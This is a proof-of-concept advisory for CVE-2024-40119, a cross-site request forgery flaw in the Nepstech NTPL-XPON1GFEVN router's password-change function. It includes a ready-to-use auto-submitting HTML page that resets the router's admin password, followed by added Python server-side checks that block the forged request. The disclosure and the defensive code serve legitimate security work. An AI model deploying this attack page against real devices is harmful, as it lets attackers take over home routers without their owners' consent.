
CVE-2024-40119 PoC: Nepstech NTPL-XPON1GFEVN Security Vulnerability

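Related vulnerability
Title: Nepstech NTPL-XPON1GFEVN Security Vulnerability (CVE-2024-40119)
Description: Nepstech NTPL-XPON1GFEVN is a wireless router made by Nepstech. Nepstech NTPL-XPON1GFEVN 1.0 with firmware version 2.0.1 contains a security vulnerability. It stems from a cross-site request forgery (CSRF) flaw in the password change function, which lets an attacker take over the account by changing the administrator password.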
Description
Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.
Introduction
# nepstech-xpon-router-CVE-2024-40119

# Author:
Subhodeep Baroi

# CVE-2024-40119: CSRF Vulnerability in Nepstech Wifi Router NTPL-XPON1GFEVN v1.0

## Description

**CVE-2024-40119** is a Cross-Site Request Forgery (CSRF) vulnerability in the Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 firmware v2.0.1. This vulnerability allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.

## Details

- **Vulnerability Type:** Cross-Site Request Forgery (CSRF)
- **Vendor of Product:** Nepstech
- **Affected Product Code Base:** Wifi Router xpon (terminal) - Model: NTPL-XPON1GFEVN - Version: 1.0 and Firmware: V2.0.1
- **Affected Component:** Router web app password-changing functionality
- **Attack Type:** Remote
- **Impact:** Admin Account Takeover

## Attack Vectors

A remote attacker can craft a malicious HTML page that triggers the password change functionality when visited by an authenticated user. Below is a sample attack vector:

```html
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
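As an added example (not part of the original README and not the vendor's firmware code), the following Python code shows generic server-side checks that would reject the request above: a same-origin check, a session-bound CSRF token, and a requirement for the current password, which the sample form submits empty. The names `check_password_change` and `issue_csrf_token`, the `csrf_token` field, the session identifier and the sample requests are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-device secret kept by the web server


def issue_csrf_token(session_id):
    """Session-bound token the router would embed in its own password form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_password_change(headers, form, session_id):
    """Return (allowed, reason) for a POST to the password-change handler."""
    host = headers.get("Host")
    # 1. Origin (or Referer) must name the host the request was sent to.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if not host or urlsplit(source).netloc != host:
        return False, "cross-origin request"
    # 2. The form must carry the session-bound token, which another site cannot read.
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, issue_csrf_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    # 3. Require the current password; the form on this page sends it empty.
    if not form.get("oldPassword"):
        return False, "current password required"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SESSION = "constructed-session-id"
FORGED = {  # same fields as the page's form, submitted from another origin
    "headers": {"Host": "192.168.1.1", "Origin": "http://other-site.example"},
    "form": {"oldUsername": "admin", "oldPassword": "",
             "newPassword": "placeholder", "cfmPassword": "placeholder"},
}
LEGIT = {  # submitted from the router's own page with token and current password
    "headers": {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"},
    "form": {"oldUsername": "admin", "oldPassword": "current-password",
             "newPassword": "placeholder", "cfmPassword": "placeholder",
             "csrf_token": issue_csrf_token(SESSION)},
}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, check_password_change(req["headers"], req["form"], SESSION))
```

Each check fails closed on its own, so a request missing the `Origin` and `Referer` headers, or one sent from the router's own origin without the token, is still rejected.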